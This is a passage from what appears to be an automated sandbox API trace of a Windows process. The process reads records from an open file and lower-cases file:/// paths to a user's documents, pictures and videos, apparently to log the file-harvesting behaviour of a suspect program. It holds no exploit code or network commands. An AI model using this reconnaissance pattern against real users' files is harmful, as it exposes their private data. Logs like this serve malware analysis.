hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x180, lpOverlapped=0x0) returned 1 [0085.754] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/iTYXKmICVRIN0bTQ.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ityxkmicvrin0btq.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ityxkmicvrin0btq.gif" [0085.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ityxkmicvrin0btq.gif") returned 124 [0085.754] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.754] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.754] SetFilePointer (in: hFile=0x9c, lDistanceToMove=36352, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e00 [0085.754] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.754] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/nOnGhMvFyP69P.pptx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/nonghmvfyp69p.pptx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/nonghmvfyp69p.pptx" [0085.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/nonghmvfyp69p.pptx") returned 64 [0085.755] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.755] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.755] SetFilePointer (in: hFile=0x9c, lDistanceToMove=36608, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f00 [0085.755] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.755] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/JNes3c.rtf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/jnes3c.rtf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/jnes3c.rtf" [0085.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/jnes3c.rtf") returned 56 [0085.755] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.755] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.755] SetFilePointer (in: hFile=0x9c, lDistanceToMove=36864, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9000 [0085.755] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.755] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/U9ror.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/u9ror.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/u9ror.flv" [0085.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/u9ror.flv") returned 53 [0085.755] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.755] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.755] SetFilePointer (in: hFile=0x9c, lDistanceToMove=37120, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9100 [0085.755] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.755] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/LplDJ8US8Y.ods" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/lpldj8us8y.ods") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/lpldj8us8y.ods" [0085.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/lpldj8us8y.ods") returned 98 [0085.755] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.755] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.755] SetFilePointer (in: hFile=0x9c, lDistanceToMove=37376, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9200 [0085.755] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.756] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/_5Xg3ieR-fEuaPUc9W9.odp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/_5xg3ier-feuapuc9w9.odp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/_5xg3ier-feuapuc9w9.odp" [0085.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/_5xg3ier-feuapuc9w9.odp") returned 88 [0085.756] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.756] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.756] SetFilePointer (in: hFile=0x9c, lDistanceToMove=37632, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9300 [0085.756] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x180, lpOverlapped=0x0) returned 1 [0085.756] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/HDFQW%20QK5sILpA%20IO/yfxU1RPal7.bmp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/yfxu1rpal7.bmp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/yfxu1rpal7.bmp" [0085.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/yfxu1rpal7.bmp") returned 140 [0085.756] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.756] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.756] SetFilePointer (in: hFile=0x9c, lDistanceToMove=38016, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9480 [0085.756] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.756] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/THSn5KdbG.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/thsn5kdbg.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/thsn5kdbg.jpg" [0085.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/thsn5kdbg.jpg") returned 58 [0085.756] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.756] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.756] SetFilePointer (in: hFile=0x9c, lDistanceToMove=38272, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9580 [0085.757] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.757] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/7oGjb-qE0L0.rtf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7ogjb-qe0l0.rtf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7ogjb-qe0l0.rtf" [0085.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7ogjb-qe0l0.rtf") returned 61 [0085.757] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.757] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.757] SetFilePointer (in: hFile=0x9c, lDistanceToMove=38528, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9680 [0085.757] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.757] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/cS9dBB0db.pps" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/cs9dbb0db.pps") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/cs9dbb0db.pps" [0085.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/cs9dbb0db.pps") returned 65 [0085.757] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.757] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.757] SetFilePointer (in: hFile=0x9c, lDistanceToMove=38784, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9780 [0085.757] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.757] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/oz2_MrsbRIZC.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/oz2_mrsbrizc.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/oz2_mrsbrizc.xlsx" [0085.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/oz2_mrsbrizc.xlsx") returned 61 [0085.757] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.757] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.757] SetFilePointer (in: hFile=0x9c, lDistanceToMove=39040, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9880 [0085.758] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.758] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/Y7YKWWpLwltoJ6hK%20z.pptx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/y7ykwwplwltoj6hk%20z.pptx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/y7ykwwplwltoj6hk%20z.pptx" [0085.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/y7ykwwplwltoj6hk%20z.pptx") returned 71 [0085.758] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.758] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.758] SetFilePointer (in: hFile=0x9c, lDistanceToMove=39296, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9980 [0085.758] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.758] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/7qgDkajlv%20OV0mtF.pptx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7qgdkajlv%20ov0mtf.pptx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7qgdkajlv%20ov0mtf.pptx" [0085.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7qgdkajlv%20ov0mtf.pptx") returned 69 [0085.758] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.758] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.758] SetFilePointer (in: hFile=0x9c, lDistanceToMove=39552, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9a80 [0085.758] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x180, lpOverlapped=0x0) returned 1 [0085.758] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/MSEz/9U1awhjmoFI.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/9u1awhjmofi.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/9u1awhjmofi.gif" [0085.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/9u1awhjmofi.gif") returned 124 [0085.758] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.758] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.759] SetFilePointer (in: hFile=0x9c, lDistanceToMove=39936, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9c00 [0085.759] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.759] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/aUHiFtR.pdf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/auhiftr.pdf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/auhiftr.pdf" [0085.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/auhiftr.pdf") returned 57 [0085.759] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.759] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.759] SetFilePointer (in: hFile=0x9c, lDistanceToMove=40192, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d00 [0085.759] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.759] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/DuZlmllYI_US.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/duzlmllyi_us.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/duzlmllyi_us.flv" [0085.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/duzlmllyi_us.flv") returned 68 [0085.759] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.759] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.759] SetFilePointer (in: hFile=0x9c, lDistanceToMove=40448, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9e00 [0085.759] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.759] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/kHV7BWlacmMoMab9Eeg.odt" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/khv7bwlacmmomab9eeg.odt") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/khv7bwlacmmomab9eeg.odt" [0085.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/khv7bwlacmmomab9eeg.odt") returned 88 [0085.759] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.759] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.759] SetFilePointer (in: hFile=0x9c, lDistanceToMove=40704, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9f00 [0085.759] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.760] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/XCrdCV/6itn%20RAYPy3K4Dh-lrq.bmp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/6itn%20raypy3k4dh-lrq.bmp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/6itn%20raypy3k4dh-lrq.bmp" [0085.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/6itn%20raypy3k4dh-lrq.bmp") returned 103 [0085.760] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.760] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.760] SetFilePointer (in: hFile=0x9c, lDistanceToMove=40960, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa000 [0085.760] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.760] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/QCJka57cOSu3vMHW1M.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/qcjka57cosu3vmhw1m.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/qcjka57cosu3vmhw1m.flv" [0085.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/qcjka57cosu3vmhw1m.flv") returned 73 [0085.760] 